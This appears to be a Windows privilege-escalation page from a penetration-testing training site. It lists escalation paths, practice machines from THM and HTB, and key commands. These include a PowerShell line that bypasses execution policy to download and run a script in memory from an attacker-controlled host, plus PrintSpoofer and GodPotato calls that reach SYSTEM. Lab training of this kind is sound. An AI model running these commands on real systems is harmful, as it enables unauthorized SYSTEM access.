Windows Privilege Escalation: practice machines and key commands
Windows privilege escalation starts with understanding who you are and what the account can do. Run whoami /all and look for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, which service accounts usually hold and which potato style tools such as PrintSpoofer and GodPotato convert to SYSTEM. Other common paths are unquoted service paths, weak service binary or registry permissions, AlwaysInstallElevated, stored credentials, scheduled tasks and UAC bypasses when you are an administrator in a medium integrity shell. Automated scripts like WinPEAS list candidates quickly, but verify each finding by hand. Check the architecture and OS build before choosing an exploit. These machines cover the main Windows escalation families. Note the integrity level of your shell, because many techniques only work from a service context or an elevated prompt. Keep payloads small, test in a lab copy first, and clean up any service or registry change you make so the box stays stable for later steps.
Key commands
Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
WinPEAS In-Memory Download & Execute
Execute WinPEAS privilege escalation scanner directly in memory via WebClient.
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:8000/winPEAS.ps1')"GodPotato SeImpersonatePrivilege Exploit
Abuse SeImpersonatePrivilege on Windows Server 2012-2022 via DCOM/RPC reflection.
GodPotato-NET4.exe -cmd "cmd.exe /c whoami"PrintSpoofer SeImpersonate / Named Pipe Exploit
Elevate from service account to SYSTEM via print spooler named pipe reflection.
PrintSpoofer64.exe -i -c cmdUnquoted Service Path Enumeration
Detect auto-starting Windows services with unquoted executable paths containing spaces.
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """AlwaysInstallElevated Registry Query
Verify if MSI packages run with elevated SYSTEM permissions via registry keys.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Keep going
- Methodology: Phase 07: Privilege Escalation & Lateral Movement
- Cheatsheet: Windows & Active Directory
Windows Privilege Escalation machines (11)
Machines are matched by their technique tags. 11 Windows.
Easy (2)
| Machine | Platform | OS |
|---|---|---|
| Alfred | THM | Windows |
| Steel Mountain | THM | Windows |
Medium (8)
| Machine | Platform | OS |
|---|---|---|
| Arkham | HTB | Windows |
| Blaster | THM | Windows |
| Hospital | HTB | Windows |
| Relevant | THM | Windows |
| Visual | HTB | Windows |
| Windows Local Persistence | THM | Windows |
| Windows PrivEsc | THM | Windows |
| Windows PrivEsc Arena | THM | Windows |
Hard (1)
| Machine | Platform | OS |
|---|---|---|
| Retro | THM | Windows |
Related techniques
Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox